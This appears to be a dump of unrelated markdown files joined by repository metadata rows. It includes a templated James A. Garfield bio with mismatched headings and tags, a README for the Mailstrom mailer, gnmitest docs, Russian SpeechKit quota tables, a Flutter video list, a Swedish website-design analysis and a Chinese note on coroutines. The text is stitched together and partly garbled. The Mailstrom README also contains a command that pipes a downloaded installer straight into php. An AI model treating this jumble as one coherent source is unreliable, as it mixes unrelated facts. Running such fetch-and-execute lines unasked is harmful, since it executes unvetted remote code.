title: James A. Garfield
date: 2021-04-07T16:00:41+00:00
author: victor
layout: post
guid: https://ukdataservers.com/james-a-garfield/
permalink: /04/07/james-a-garfield
tags:
- show love
- unspecified
- single
- relationship
- engaged
- married
- complicated
- open relationship
- widowed
- separated
- divorced
- Husband
- Wife
- Boyfriend
- Girlfriend
category: Guides
---
* some text
{: toc}
## Who is James A. Garfield
The 20th U.S. President whose presidency lasted only 200 days and ended with his assassination by Charles J. Guiteau.
## Prior to Popularity
He had dreams of being a seaman, so he left home at 16 to become a canal driver.
## Random data
He served nine consecutive terms in the House of Representatives representing Ohio’s 19th district.
## Family & Everyday Life of James A. Garfield
His father passed away when he was 17 months old, leaving his mother, Eliza Ballou, to raise him alone.
## People Related With James A. Garfield
He was visiting Wall Street when Abraham Lincoln was assassinated and was prompted to give a speech to a rioting crowd in an effort to calm them down.
| 18.455696 | 150 | 0.587106 | eng_Latn | 0.999187 |
1497653be9b42c1b55a39cb939c59a968478e816 | 3,606 | md | Markdown | README.md | beryllium/mailstrom | bc07e5fac09df59afcbb2fe581707559d69a9775 | [
"MIT"
] | 1 | 2016-04-25T09:45:27.000Z | 2016-04-25T09:45:27.000Z | README.md | beryllium/mailstrom | bc07e5fac09df59afcbb2fe581707559d69a9775 | [
"MIT"
] | null | null | null | README.md | beryllium/mailstrom | bc07e5fac09df59afcbb2fe581707559d69a9775 | [
"MIT"
] | null | null | null | Mailstrom
=========
Mailstrom is a command-line script for sending emails via SMTP or Amazon SES.
It behaves similarly to the UNIX `mail` command, in that it can accept an email body via a pipe and then transmit it
over the configured protocol to the specified destination:
$> echo "Testing" | bin/mailstrom -s "My Subject" my.email@example.com
It can also be used interactively to write emails, just like `mail` (press Ctrl+D on a blank line to signal the end of input):
$> mail -s "My Subject" my.email@example.com
Dear Sir or Madam,
I would like to tell you about how awesome the developer of Mailstrom is, and how
you should totally follow his blog at http://whateverthing.com/ and perhaps even
sign up for his forum-as-a-service offering at http://wtboard.com/
Sincerely,
Testy Q. McTesterson
^D
Sendmail and Postfix can be a hassle, and are largely overkill for most cloud servers, so with Mailstrom you can save
yourself the maintenance headaches of maintaining your own mail daemons on your multitude of servers/instances.
---
... this can be nothing else than the great whirlpool of the Maelström ...
... in the centre of the channel of the Maelström is an abyss penetrating the globe ...
... the ordinary accounts of this vortex had by no means prepared me for what I saw ...
---
Installation
------------
Fetch from Github and install dependencies using Composer:
$> git clone git://github.com/beryllium/mailstrom mailstrom
$> cd mailstrom
$> curl -s https://getcomposer.org/installer | php
$> ./composer.phar install
Configure it to be available in your $PATH:
$> cd /usr/local/bin
$> ln -s /path/to/mailstrom/bin/mailstrom mailstrom
Or, if you wish, configure it as a drop-in replacement for the "mail" command (presuming it does not currently exist):
$> cd /usr/local/bin
$> ln -s /path/to/mailstrom/bin/mailstrom mail
Configuration
-------------
Mailstrom looks in /etc/mailstrom.ini and ~/.mailstrom.ini for connection settings, but you can also specify other fields (From/To/Subject/Message)
in the INI file. From/To/Subject/Message values specified on the command line take precedence over the INI values.
An example Amazon SES configuration file would look like:
access_key=AAAAAKAKKAKAK
secret_key=AEAET+/akakak
from=no-reply@example.com
Alternatively, an SMTP configuration file would specify a "type" (Amazon SES is assumed to be the default type) as well as SMTP-specific settings:
type=smtp
smtp_server=mail.example.com
smtp_port=25
smtp_user=username (optional)
smtp_pass=pass (optional)
smtp_encryption=ssl (optional. Supports ssl and tls. Omit this setting to leave encryption disabled.)
from=no-reply@example.com
**Note:** Some passwords with special characters may need to be quoted in the INI files, in order to prevent `parse_ini_file` from throwing errors:
smtp_pass="This password is SPECIAL!!!11!"
Usage
-----
As mentioned above, this is intended to be somewhat of a replacement for the `mail` command, so you can use it like this:
$> cat MyFile.txt | mailstrom --to user@example.com --subject "Output of MyFile.txt"
Or you can specify the message as a string:
$> mailstrom --to user@example.com --subject "Output of MyFile.txt" --message "My email message"
Credits
-------
Built by Kevin Boyd ( http://whateverthing.com | http://github.com/beryllium ) using Amazon's AWS SDK for PHP 2, GetOptionKit, and SwiftMailer.
Note: This project is in no way related to the Mailstrom "Inbox Zero" mail client.
| 36.424242 | 147 | 0.727953 | eng_Latn | 0.98872 |
1497e30e21e440157d9c0183b82ccaee7448f342 | 6,804 | md | Markdown | docs/running_gnmitest.md | openconfig/gnmitest | 6fa03d5c30d059536e1ee70ee5bc368be10c1fdf | [
"Apache-2.0"
] | 12 | 2018-10-09T15:44:28.000Z | 2021-12-24T11:21:12.000Z | docs/running_gnmitest.md | openconfig/gnmitest | 6fa03d5c30d059536e1ee70ee5bc368be10c1fdf | [
"Apache-2.0"
] | null | null | null | docs/running_gnmitest.md | openconfig/gnmitest | 6fa03d5c30d059536e1ee70ee5bc368be10c1fdf | [
"Apache-2.0"
] | 5 | 2018-11-30T18:05:42.000Z | 2021-11-29T15:19:21.000Z | # Understanding the gnmitest Suite proto message
The gnmitest service has an RPC called **Run**. It receives a `Suite` proto
message from a client and returns a `Report` proto message. The `Suite` message
contains connection information, and a test specification (including gNMI
message payloads, such as subscription paths). At a high level, the `Suite`
message contains a list of `InstanceGroup` messages to execute sequentially.
Each `InstanceGroup` contains a set of `Instance` messages to run in parallel.
`Instance` contains a `Test` message which specifies a particular test to be run
against a gNMI RPC.
A `Test` message can have either `SubscribeTest` or `GetSetTest` messages
specified. `SubscribeTest` describes a set of tests that can be run against the
gNMI `Subscribe` RPC. `GetSetTest` describes tests that can be run against
either `Get`, `Set`, or both. The other fields (`timeout`, `schema` and
`connection`) of the `Test` message may be set if the `Suite` level counterparts
are to be overridden.
For the `Subscribe` RPC the `SubscribeTest` message describes both the gNMI
`SubscribeRequest`, and hence the subscription information, as well as the test
to execute. The oneof `args` field in `SubscribeTest` indicates which test is
to be executed by the framework using the specified subscription (i.e., which
test handles the `SubscribeResponse` messages received). Some tests require
arguments, which are described in the message within the `args` `oneof`
corresponding to the test.
## Example Suite Message
The sample `Suite` message below demonstrates the high-level structure of a
gnmitest `Suite`:
```proto
name: "demo suite"
# duration in seconds a test is allowed to run.
timeout: 5
schema: "openconfig"
connection {
target: "_target_"
address: "_address_of_gnmi_server_"
# dial timeout.
timeout: 10
}
instance_group_list {
description: "existence check"
instance {
description: "has keys test for _target_"
test {
subscribe {
request {
subscribe {
prefix {
target: "_target_"
origin: "openconfig"
}
subscription {
}
mode: ONCE
}
}
has_keys {
path {
elem {
name: "components"
}
elem {
name: "component"
}
}
item {
key {
key: "name"
value: "_key_"
}
}
}
}
}
}
}
```
The `Suite` message above specifies a simple test that checks for the
presence of the key `_key_` in the `/components/component` OpenConfig list.
The test that executes this check is the `has_keys` test. The arguments supplied
are specified within the `has_keys` field of the `args` oneof.
When the `Suite` message is sent to the gnmitest runner, it
creates a subscription to the device with the given gNMI `SubscribeRequest` and
dispatches received messages to the `has_keys` test. The `Suite` level
configuration parameters are effective unless they are overridden by individual
tests:
* __timeout:__ Amount of time a test is allowed to run.
* __connection:__ Address and credentials to use while connecting to gNMI
target.
* __schema:__ An identifier to choose between registered Go representation of
OpenConfig schemas.
**Note**: By default, OpenConfig is assumed to be the schema that is
supported by the target. Other YANG schemas can be used by generating Go
code using [ygot](https://github.com/openconfig/ygot) and registering the
schema with gnmitest, (by creating a
[registration package](https://github.com/openconfig/gnmitest/blob/master/schemas/openconfig/register/openconfig.go)
and [importing it](https://github.com/openconfig/gnmitest/blob/8faacdae6b7a8bddbeb3781b1288f389e7d25c4e/service/service.go#L30)).
## Executing a gnmitest Suite
The gnmitest framework is exposed through the gnmitest service which is a gRPC
server. To start gnmitest service, you should run the following command:
```
go run $GOPATH/src/github.com/openconfig/gnmitest/cmd/gnmitest_service/gnmitest_service.go
```
**Note:** Host and port to start the service can be configured with `bind` and
`port` flags. Default values are ==localhost:11601==.
Once the gnmitest service is running, we can use **gnmitest_cli** to execute a
`Suite` message as follows:
```
go run $GOPATH/src/github.com/openconfig/gnmitest/cmd/gnmitest_cli/gnmitest_cli.go -address localhost:11601 -suite testdata/suite.textproto -report testdata/report.textproto
```
**Note:** Address provided above is the default host and port value specified to
run **gnmitest_service**.
**Note:** The example `Suite` textproto specified in the command above doesn't
specify a valid gNMI target. You can edit the `Connection` message in `Suite`
text proto to override this.
## Example Report Message
Once `Suite` is executed, a `Report` is returned that summarizes the set of
tests executed and their results. An example `Report` looks like as follows:
```proto
results: <
instance: <
test: <
test: <
timeout: 20
schema: "openconfig"
connection: <
target: "_target_"
address: "_address_of_gnmi_server_"
timeout: 10
>
subscribe: <
request: <
subscribe: <
prefix: <
origin: "openconfig"
target: "_target_"
>
subscription: <
>
mode: ONCE
>
>
value_validation: <
>
>
>
result: FAIL
subscribe: <
status: EARLY_FINISHED
errors: <
message: "rpc error: code = Unknown desc = failed to update struct field Type in *uoc.OpenconfigPlatform_Components_Component_State with value string_val:\"MODULE\" ; could not find suitable union type to unmarshal value string_val:\"MODULE\" type *gnmi_go_proto.TypedValue into parent struct type *uoc.OpenconfigPlatform_Components_Component_State field Type"
>
>
>
>
>
```
`Report` message has a similar structure to `Suite` message. There is an
`InstanceGroup` result message in `Report` proto corresponding to each
`InstanceGroup` in `Suite` proto. The sample provided above corresponds to an
`InstanceGroup` containing single `Instance`. The `Test` message in `Suite`
proto is included in the result. `result` field contains the result of running
`Test`. For `Subscribe` tests, additional information about how test ended
(`status`) and errors received while running test are also included. In `Suite`
proto, you could also set `log_responses` to true to indicate including
`SubscribeResponse` messages in the report.
| 36.385027 | 371 | 0.693857 | eng_Latn | 0.992885 |
1499d24dc4ca5811b83c836cde10cd3a74a07204 | 1,456 | md | Markdown | ru/_includes/speechkit-limits.md | anton-bryukhov/docs | 8fb69a121137c195745c17cc1e7f0cc68169edec | [
"CC-BY-4.0"
] | null | null | null | ru/_includes/speechkit-limits.md | anton-bryukhov/docs | 8fb69a121137c195745c17cc1e7f0cc68169edec | [
"CC-BY-4.0"
] | null | null | null | ru/_includes/speechkit-limits.md | anton-bryukhov/docs | 8fb69a121137c195745c17cc1e7f0cc68169edec | [
"CC-BY-4.0"
] | null | null | null | #### Квоты {#speechkit-quotas}
Вид ограничения | Значение
----- | -----
[**Распознавание коротких аудио**](../speechkit/stt/request.md) |
Запросов в секунду | 20
[**Потоковый режим распознавания коротких аудио**](../speechkit/stt/streaming.md) |
Запросов в секунду | 40
[**Распознавании длинных аудио**](../speechkit/stt/streaming.md) |
Запросов на распознавание в час | 500
Запросов на проверку статуса операции в час | 2500
Тарифицированных часов аудио в день | 10000
[**Cинтез речи**](../speechkit/tts/request.md) |
Запросов в секунду | 40
#### Лимиты {#speechkit-limits}
Вид ограничения | Значение
----- | -----
[**Распознавание коротких аудио**](../speechkit/stt/request.md) | |
Максимальный размер файла | {{ stt-short-fileSize }}
Максимальная длительность аудио | {{ stt-short-audioLength }}
Максимальное количество аудиоканалов | {{ stt-short-channelsCount }}
[**Потоковый режим распознавания коротких аудио**](../speechkit/stt/streaming.md) |
Максимальная длительность переданного аудио за всю сессию | {{ stt-streaming-audioLength }}
Максимальный размер переданных аудиоданных | {{ stt-streaming-fileSize }}
Максимальное количество аудиоканалов | {{ stt-short-channelsCount }}
[**Распознавании длинных аудио**](../speechkit/stt/streaming.md) |
Максимальный размер файла | {{ stt-long-fileSize }}
Максимальная длительность аудио | {{ stt-long-audioLength }}
Срок хранения результатов распознавания на сервере | {{ stt-long-resultsStorageTime }} | 46.967742 | 91 | 0.740385 | rus_Cyrl | 0.860738 |
149a0bfee7fd5bef0e00c37a5b84f0dc5e659fcf | 4,583 | md | Markdown | src/docs/resources/videos.md | youngyou/flutter.cn | 0135c209e1dfe7d93489de842d045cf52de3b727 | [
"CC-BY-3.0"
] | 5 | 2021-04-05T01:18:50.000Z | 2021-04-28T02:27:19.000Z | src/docs/resources/videos.md | youngyou/flutter.cn | 0135c209e1dfe7d93489de842d045cf52de3b727 | [
"CC-BY-3.0"
] | null | null | null | src/docs/resources/videos.md | youngyou/flutter.cn | 0135c209e1dfe7d93489de842d045cf52de3b727 | [
"CC-BY-3.0"
] | 1 | 2019-04-25T00:59:56.000Z | 2019-04-25T00:59:56.000Z | ---
title: Technical videos
title: 学习 Flutter 的视频列表
description: Available videos on various aspects of developing in Flutter.
description: 开发 Flutter 应用时的技术学习视频。
---
These Flutter videos, produced both internally at Google and by the
Flutter community, may help if you are a visual learner.
Note that many people make Flutter videos. This page shows some that
we like, but there are many others.
---
## Series
The following list of series features the introduction to the series,
with a link to the complete playlist.
### Flutter in Focus
Five-to-ten minute tutorials (more or less) on using Flutter.
<iframe width="560" height="315" src="https://www.youtube.com/embed/wgTBLj7rMPM" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
Introducing Widget of the Week<br>
[Flutter in Focus playlist][]
### Flutter Widget of the Week
Do you have 60 seconds? Each one-minute video highlights a Flutter widget.
<iframe width="560" height="315" src="https://www.youtube.com/embed/b_sQ9bMltGU" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
Introducing Widget of the Week<br>
[Flutter Widget of the Week playlist][]
### The Boring Flutter Show
This series features Flutter programmers live coding in real time.
Coding mistakes, solutions, and snazzy intro music included.
<iframe width="560" height="315" src="https://www.youtube.com/embed/vqPG1tU6-c0" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
Introducing the Boring Flutter Show<br>
[The Boring Flutter Show playlist][]
### Flutter Live '18
Catch the content from Flutter Live '18, where Flutter 1.0 was officially launched.
<iframe width="560" height="315" src="https://www.youtube.com/embed/D-o4BqJxmJE" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
Flutter Live Keynote Recap<br>
[Flutter Live '18 playlist][]
### Flutter Challenge series by Fluttery
Each episode solves a different design challenge.
<iframe width="560" height="315" src="https://www.youtube.com/embed/GFRfSM4yA9U?rel=0" frameborder="1" allow="autoplay; encrypted-media" allowfullscreen></iframe>
[Flutter Challenge playlist][]
### Flutter Weekly Widgets by MTechViral
Weekly episodes, released on Sunday, feature Flutter widgets.
<iframe width="560" height="315" src="https://www.youtube.com/embed/aVZ5rsA4Yx8?rel=0" frameborder="1" allow="autoplay; encrypted-media" allowfullscreen></iframe>
Episode 1: Sized Box<br>
[Flutter Weekly Widgets playlist][]
---
{% comment %}
Comment this out until we have a working Conference playlist link.
## Conference talks
Here are a few recent Flutter talks given at various conferences,
listed by newest first.
<iframe width="560" height="315" src="https://www.youtube.com/embed/p4yLzYwy_4g?rel=0" frameborder="0" allow="autoplay; encrypted-media" allowfullscreen></iframe>
[Conference Talks playlist]()
{% endcomment %}
## Flutter Developer Stories
Videos showing how various customers, such as Abbey Road Studio, Hamilton,
and Alibaba, have used Flutter to create beautiful compelling apps with
millions of downloads.
<iframe width="560" height="315" src="https://www.youtube.com/embed/_ACWeGGBP4E" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
[Flutter Developer Stories playlist][]
---
## Online course
Learn how to build Flutter apps with these free video courses:
* [Build Native Mobile Apps with Flutter](https://www.udacity.com/course/build-native-mobile-apps-with-flutter--ud905)
* [Flutter Crash Course](https://fluttercrashcourse.com/), by Nick Manning
[The Boring Flutter Show playlist]: https://www.youtube.com/playlist?list=PLjxrf2q8roU3ahJVrSgAnPjzkpGmL9Czl
[Flutter Widget of the Week playlist]: https://www.youtube.com/playlist?list=PLjxrf2q8roU23XGwz3Km7sQZFTdB996iG
[Flutter Challenge playlist]: https://www.youtube.com/playlist?list=PLkXouNW6n0A8ANZ16Fk49qsxpBbzxHGCn
[Flutter Weekly Widgets playlist]: https://www.youtube.com/playlist?list=PLR2qQy0Zxs_Wot7YfLeeKdMlJ9838C_w0
[Flutter in Focus playlist]: https://www.youtube.com/playlist?list=PLjxrf2q8roU2HdJQDjJzOeO6J3FoFLWr2
[Flutter Live '18 playlist]: https://www.youtube.com/playlist?list=PLjxrf2q8roU38by1vmaw_BHHsy7emEXl-
[Flutter Developer Stories playlist]: https://www.youtube.com/playlist?list=PLjxrf2q8roU33POuWi4bK0zvDpAHK6759
| 40.919643 | 202 | 0.781802 | eng_Latn | 0.755278 |
149ae453da31edfec58bee6613896919e3b5fb62 | 8,206 | md | Markdown | content/analysis/600_design-principles.md | mafd16/anax-flat | 27985196500d7aa4de9f81ec184d5d27f4204b0c | [
"MIT"
] | null | null | null | content/analysis/600_design-principles.md | mafd16/anax-flat | 27985196500d7aa4de9f81ec184d5d27f4204b0c | [
"MIT"
] | null | null | null | content/analysis/600_design-principles.md | mafd16/anax-flat | 27985196500d7aa4de9f81ec184d5d27f4204b0c | [
"MIT"
] | null | null | null | ---
views:
byline:
region: after-main
template: default/content
sort: 1
data:
meta:
type: content
route: block/byline
...
Design-principles
=================
Här ska jag utvärdera webbplatsers designprinciper.
Att göra ett bra urval som täcker olika designprinciper kan vara svårt. Det går inte hur som helst att söka efter en sida med en viss designprincip. Jag har valt sidor som uppfyller att dom använder sig av andra designprinciper än resterande sidor i urvalet. De principer jag funnit är
+ symmetri och balans
+ linjer, djup, rörelse och centrering
+ alignment och proportion
+ mönster (pattern), rotation och textur
För att ha bra koll på de designprinciper som finns har jag använt mig av kurslitteraturen, främst boken 'The Principles of Beautiful Web Design' och spellistan på youtube som rekommenderades.
De webbplatser jag har valt att analysera är:
+ www.texaslonghorn.se
+ us.vibram.com
+ www.pokemon.com/se
+ garntua.se
<hr>
1. www.texaslonghorn.se
--------------------------
#### Skärmdump
<img src="img/analysis/texas.PNG" alt="texaslonghorn.se">
#### Webbplatsens mål och syfte. Varför finns webbplatsen till?
Jag tror att de som letar sig fram till Texas Longhorns hemsida ofta redan har en egen uppfattning om maten och restaurangerna. Syftet för hemsidan bör i så fall vara att förstärka den matupplevelse man kan få där. Som hemside-besökare som inte besökt en restaurang ska sidan inspirera till att vilja göra ett besök. Sekundära syften bör vara att visa meny, öppettider, adresser och erbjuda bordsbokning. Allt detta tycker jag att dom lyckas med.
#### Webbplatsens design och vad som kännetecknar den rent allmänt.
Webbplatsen har en symmetrisk design. Den är delad i mitten, och sidorna är nästintill spegelbilder av varandra. Den känns helt klart balanserad, både horisontellt och vertikalt.
#### Gynnar designen webbplatsens mål och syfte? Vilken känsla ger designen?
Designen gynnar definitivt sidans mål och syfte. Den tydliga skiljelinjen i mitten drar till sig uppmärksamheten, och där stöter man på nyckelordet 'or', vilket mycket kortfattat är en fråga till besökaren, "vad vill du göra här på sidan?". Därifrån hittar man snabbt nyckelordet 'restaurants'. Man behöver inte leta efter det man söker, det uppenbarar sig självt. Bakgrundsbilderna bygger sen på känslan av matupplevelse som man vill framhäva.
#### Lyft fram den eller de designprinciper som kännetecknar webbplatsens design. (exemplifiera.)
Symmetri. Som jag nämnde ovan så är sidan praktiskt taget så symmetrisk den kan bli, som spegelbilder.
Balans. Lika mycket innehåll åt alla håll. Överst är loggan och vänster, höger och nedtill har varsin länk. Längst ner finns en liten footer.
#### Kika om designprinciperna som används är lika/olika för framsidan och undersidorna och kommentera.
På undersidorna har man tagit bort den tydliga mittlinjen, men i övrigt så har man genomgående en symmetrisk och balanserad design.
Som extra kan nämnas att sidan är på helskärm. Bilderna på sidan är antingen av mat, eller som bakgrunder på texturer för att efterlikna tegelväggar eller trä-element. Man använder inte färger med gradients.
2. us.vibram.com
--------------------------
#### Skärmdump
<img src="img/analysis/vibram.PNG" alt="us.vibram.com">
#### Webbplatsens mål och syfte. Varför finns webbplatsen till?
Vibram är ett skomärke, så hemsidans syfte bör vara att marknadsföra sina produkter. Sekundära syften, att visa adresser till affärer, och lyfta de teknologier man använder i sina produkter.
#### Webbplatsens design och vad som kännetecknar den rent allmänt.
Sidan använder sig av en bakgrundsbild som i sig använder linjer för att skapa djup. Löparna som springer in i djupet skapar rörelse. I kanterna av hemsidan finns objekt som skapar en cirkulär känsla över hemsidan. Allt detta centrerar besökarens ögon mot mitten där man har ett utvalt innehåll, som jag antar att man vill lyfta fram.
#### Gynnar designen webbplatsens mål och syfte? Vilken känsla ger designen?
Löparna i rörelse skapar helt klart ett intresse för sidans produkter. Designen riktar också besökarens intresse mot produkterna som har länkar i mitten. Så ja, designen gynnar syftet. Sen att vinterpynta sidan så som dom har gjort kanske inte skapar en känsla för att vilja ge sig ut och springa.
#### Lyft fram den eller de designprinciper som kännetecknar webbplatsens design. (exemplifiera.)
Allt i designen finns för att rikta besökarens intresse mot mitten. Linjer som konvergerar mot mitten, löpare som springer mot mitten, snöflingor i ring runt mitten.
#### Kika om designprinciperna som används är lika/olika för framsidan och undersidorna och kommentera.
Man har i undersidorna behållt istapparna som hänger ned från headern, annars är alla centrerande objekt borta i undersidorna, och man har en mer rektangulär design.
3. www.pokemon.com/se
--------------------------
#### Skärmdump
<img src="img/analysis/pokemon.PNG" alt="pokemon.com/se">
#### Webbplatsens mål och syfte. Varför finns webbplatsen till?
Jag har personligen svårt att förstå mig på pokemon-hysterin, och har därför även svårt att förstå mig på syftet med hemsidan. Jag antar att företaget bakom genom hemsidan vill öka det stora intresse som redan finns, och även göra reklam för sina produkter.
#### Webbplatsens design och vad som kännetecknar den rent allmänt.
I sin design så jobbar man med raka linjer, dvs att man radar upp objekt på rad, efter räta linjer. Vidare så jobbar man med objekt i olika proportioner, dvs ett objekt A är dubbelt så stort som objekt B, som i sin tur är dubbelt så stort som objekt C. Dessa objekt är också grupperade utefter räta linjer.
#### Gynnar designen webbplatsens mål och syfte? Vilken känsla ger designen?
Designen gynnar säkert sidans syfte och mål, men bara för den som är insatt i pokemon. För en oinsatt så är designen mest bara rörig. Man vet inte var man ska kolla. Det som hade behövts är en om-sida, vilket jag finner endast om jag letar mig ända ner till footern (föräldrar-guide).
Även om designen för mig känns rörig, så väcker ändå uppradningen av elementen utefter räta linjer en viss känsla för struktur. Det är nog tydligare för den som är insatt i ämnet pokemon.
#### Lyft fram den eller de designprinciper som kännetecknar webbplatsens design. (exemplifiera.)
Element utefter räta linjer. Storlek på element i förhållande till varandra.
#### Kika om designprinciperna som används är lika/olika för framsidan och undersidorna och kommentera.
Design-principerna återkommer även i undersidorna. Elementen ligger där även snyggt uppradat utefter räta linjer. Man har också likadan form på olika element i olika storlek.
4. garntua.se
--------------------------
#### Skärmdump
<img src="img/analysis/garntua.PNG" alt="garntua.se">
#### Webbplatsens mål och syfte. Varför finns webbplatsen till?
Webbplatsen är på förstasidan en blogg, och på undersidorna finner vi info om fysisk butik och material, öppettider och en webbshop. Syftet med sidan är att marknadsföra butiken, och att öka intresset för stickning.
#### Webbplatsens design och vad som kännetecknar den rent allmänt.
Sidan har ett pattern som bakgrund. Man jobbar med rotation på några bilder (och även ramar som skapar en polaroid-känsla) för att skapa en mer levande hemsida. Till höger på sidan ligger en lista som har en sida ur ett kollegieblock som bakgrund, texture.
#### Gynnar designen webbplatsens mål och syfte? Vilken känsla ger designen?
Designen gynnar syftet med sidan, genom att skapa en känsla för småskaligt, hantverksmässigt, mjukt, naturligt.
#### Lyft fram den eller de designprinciper som kännetecknar webbplatsens design. (exemplifiera.)
Pattern i bakgrunden. Rotation på bilderna i headern. Texture på listan till höger.
#### Kika om designprinciperna som används är lika/olika för framsidan och undersidorna och kommentera.
De roterande bilderna återkommer i flera undersidor. Det känns som att dom på det sättet håller sig till samma designtema oavsett undersida.
Deltagare i analysen
====================
Design-analysen är gjord av Martin Fagerlund.
| 51.936709 | 446 | 0.771874 | swe_Latn | 1.000002 |
149b8865dcc64c324359ec26800429c183ef5527 | 4,085 | md | Markdown | iis/extensions/database-manager-reference/databaseprovider-methods-microsoft-web-management-databasemanager.md | baxter40/iis-docs | 484babba6fc20bdfc12a1a3fbceb5efc17afc356 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | iis/extensions/database-manager-reference/databaseprovider-methods-microsoft-web-management-databasemanager.md | baxter40/iis-docs | 484babba6fc20bdfc12a1a3fbceb5efc17afc356 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | iis/extensions/database-manager-reference/databaseprovider-methods-microsoft-web-management-databasemanager.md | baxter40/iis-docs | 484babba6fc20bdfc12a1a3fbceb5efc17afc356 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: DatabaseProvider Methods (Microsoft.Web.Management.DatabaseManager)
TOCTitle: DatabaseProvider Methods
ms:assetid: Methods.T:Microsoft.Web.Management.DatabaseManager.DatabaseProvider
ms:mtpsurl: https://msdn.microsoft.com/en-us/library/microsoft.web.management.databasemanager.databaseprovider_methods(v=VS.90)
ms:contentKeyID: 20476407
ms.date: 05/02/2012
mtps_version: v=VS.90
---
# DatabaseProvider Methods
The [DatabaseProvider](databaseprovider-class-microsoft-web-management-databasemanager.md) type exposes the following members.
## Methods
||Name|Description|
|--- |--- |--- |
|.gif "Public method")|[CalculateConnectionString](databaseprovider-calculateconnectionstring-method-microsoft-web-management-databasemanager.md)|Returns the calculated connection string for the database provider.|
|.gif "Public method")|[Equals](https://msdn.microsoft.com/library/bsc2ak47)|(Inherited from [Object](https://msdn.microsoft.com/library/e5kfa45b).)|
|.gif "Public method")|[ExecuteQuery](databaseprovider-executequery-method-microsoft-web-management-databasemanager.md)|Returns an array of query results after executing a database query.|
|.gif "Protected method")|[Finalize](https://msdn.microsoft.com/library/4k87zsw7)|(Inherited from [Object](https://msdn.microsoft.com/library/e5kfa45b).)|
|.gif "Public method")|[GetDatabaseHostName](databaseprovider-getdatabasehostname-method-microsoft-web-management-databasemanager.md)|Returns the host name of the computer where the database in the connection string is located.|
|.gif "Public method")|[GetDatabaseInfo](databaseprovider-getdatabaseinfo-method-microsoft-web-management-databasemanager.md)|Returns database-specific information for the database provider.|
|.gif "Public method")|[GetHashCode](https://msdn.microsoft.com/library/zdee4b3y)|(Inherited from [Object](https://msdn.microsoft.com/library/e5kfa45b).)|
|.gif "Public method")|[GetServerTypes](databaseprovider-getservertypes-method-microsoft-web-management-databasemanager.md)|Returns the list of supported server types for a database provider.|
|.gif "Public method")|[GetService](databaseprovider-getservice-method-microsoft-web-management-databasemanager.md)|Returns the service object for a database provider.|
|.gif "Public method")|[GetType](https://msdn.microsoft.com/library/dfwy45w9)|(Inherited from [Object](https://msdn.microsoft.com/library/e5kfa45b).)|
|.gif "Protected method")|[MemberwiseClone](https://msdn.microsoft.com/library/57ctke0a)|(Inherited from [Object](https://msdn.microsoft.com/library/e5kfa45b).)|
|.gif "Public method")|[TestConnection](databaseprovider-testconnection-method-microsoft-web-management-databasemanager.md)|Tests a connection string for a database provider.|
|.gif "Public method")|[ToString](https://msdn.microsoft.com/library/7bxwbwt2)|(Inherited from [Object](https://msdn.microsoft.com/library/e5kfa45b).)|
|.gif "Public method")|[VerifyDependencies](databaseprovider-verifydependencies-method-microsoft-web-management-databasemanager.md)|Verifies the database dependencies for your provider.|
## See Also
### Reference
[DatabaseProvider Class](databaseprovider-class-microsoft-web-management-databasemanager.md)
[Microsoft.Web.Management.DatabaseManager Namespace](microsoft-web-management-databasemanager-namespace.md)
| 97.261905 | 283 | 0.801469 | yue_Hant | 0.232425 |
149ceace394405a0940330957bbdd8deadcdf995 | 200 | md | Markdown | README.md | vjcoder33/jifflenow-assignment | 59d8bd32804336071a12f2a1a93b1bcc4e7dd4e3 | [
"MIT"
] | null | null | null | README.md | vjcoder33/jifflenow-assignment | 59d8bd32804336071a12f2a1a93b1bcc4e7dd4e3 | [
"MIT"
] | null | null | null | README.md | vjcoder33/jifflenow-assignment | 59d8bd32804336071a12f2a1a93b1bcc4e7dd4e3 | [
"MIT"
] | null | null | null | ## Instructions to run the app
1) npm install
2) yarn start
or
1) git clone https://github.com/vjcoder33/jifflenow-assignment.git
2) cd build
3) npm install live-server
4) live-server --port=8080
| 16.666667 | 66 | 0.74 | eng_Latn | 0.728088 |
149d19093bffeb2434c588fcfb5808a24a3305f6 | 1,250 | md | Markdown | _posts/2017/2017-02-09-coroutine.md | imgavinwang/imgavinwang.github.com | 18a794be7acc0cab3ac84329f6eb09c0f71ce5d5 | [
"MIT"
] | null | null | null | _posts/2017/2017-02-09-coroutine.md | imgavinwang/imgavinwang.github.com | 18a794be7acc0cab3ac84329f6eb09c0f71ce5d5 | [
"MIT"
] | null | null | null | _posts/2017/2017-02-09-coroutine.md | imgavinwang/imgavinwang.github.com | 18a794be7acc0cab3ac84329f6eb09c0f71ce5d5 | [
"MIT"
] | null | null | null | ---
layout: post
title: coroutine协程历史
date: 2017-02-09 18:28:58
categories:
- coroutine
tags:
---
协程诞生解决的是低速IO和高速的CPU的协调问题,解决这类问题主要有三个有效途径:
- 异步非阻塞网络编程(libevent、libev、redis、Nginx、memcached这类)
- 协程(golang、gevent)
- “轻量级线程”,相当于是在语言层面做抽象(Erlang)
对比之下协程的编程难度较低,不要求编程人员要有那么高的抽象思维能力。再加上golang在这方面优秀的实践,协程目前的前途还是一片光明的。当然还有一点,我们要承认无论你状态机、callback设计得多么精妙,现实中阻塞事很难以避免的。避免了Network IO Blocking,还有Disk IO Blocking,还有数据库Blocking,还有日志Blocking,还有第三方库blocking,还有愚蠢的人类blocking……
协程是基于事件驱动的异步模型的封装,比线程和进程都要轻,而且它没有线程的资源共享的问题,进程通信的问题。
个人觉得solution可以这样(从C程序员的角度):如果用协程就不要用线程(pthread),一个进程随你开多少个协程,服务器案例(SRS);如果用多线程,一个线程一个event loop(epoll),服务器案例(Muduo) @陈硕 。两种都能发挥多核优势。
